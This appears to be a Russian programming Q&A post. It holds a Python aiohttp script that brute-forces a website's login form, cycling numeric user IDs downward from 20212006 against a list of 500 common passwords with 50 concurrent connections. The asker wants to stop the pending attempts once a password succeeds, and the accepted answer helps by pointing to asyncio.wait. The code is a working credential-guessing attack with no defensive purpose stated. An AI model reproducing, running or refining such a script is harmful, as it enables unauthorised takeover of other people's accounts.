# Как удалить все оставшиеся задачи из asyncio aiohttp

Tags: python, asyncio, aiohttp

Есть код для перебора паролей. Как прекратить перебор оставшихся задач если мы нашли нужный пароль и перейти к следующему логину в main и начать перебирать пароли там

```
from bs4 import BeautifulSoup
import asyncio
import aiohttp


async def brute_force(session, login, password):
    data_ = {"USER_LOGIN": login,
             "USER_PASSWORD": password,
             "TYPE": "AUTH",
             "AUTH_FORM": "Y",
             "backurl": "/auth/",
             "Login": "Войти"}

    headers_ = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0"}
    url_ = "site.ru"

    async with session.post(url=url_, headers=headers_, data=data_) as response:
        response_text = await response.text()
        soup = BeautifulSoup(response_text, "lxml")
        title_ = soup.find("title").text
        if title_ == "Точка входа":
            print(False, login, password)
        else:
            print(True, login, password)
            #Здесь надо выйти обратно в main для изменения логина и удалить удалить оставшиеся задачи


async def gather_tasks(id_):
    async with aiohttp.ClientSession(connector=aiohttp.TCPConnector(limit=50)) as session:
        tasks = []
        with open("500-worst-passwords.txt", "r") as passwords_file:
            while True:
                try:
                    password_ = passwords_file.readline()
                except UnicodeDecodeError:
                    continue
                if not password_:
                    break
                task = asyncio.create_task(brute_force(session, id_, password_.strip()))
                tasks.append(task)

        await asyncio.gather(*tasks)


def main():
    for id in range(20212006, -1, -1):
        asyncio.run(gather_tasks(id))


if __name__ == '__main__':
    main()
```

Answer (score 1, accepted):

Используйте вместо await asyncio.gather(*tasks)

> asyncio.wait(aws, *, loop=None, timeout=None, return_when=FIRST_COMPLETED)

return_when указывает, когда эта функция должна вернуться

https://docs.python.org/3/library/asyncio-task.html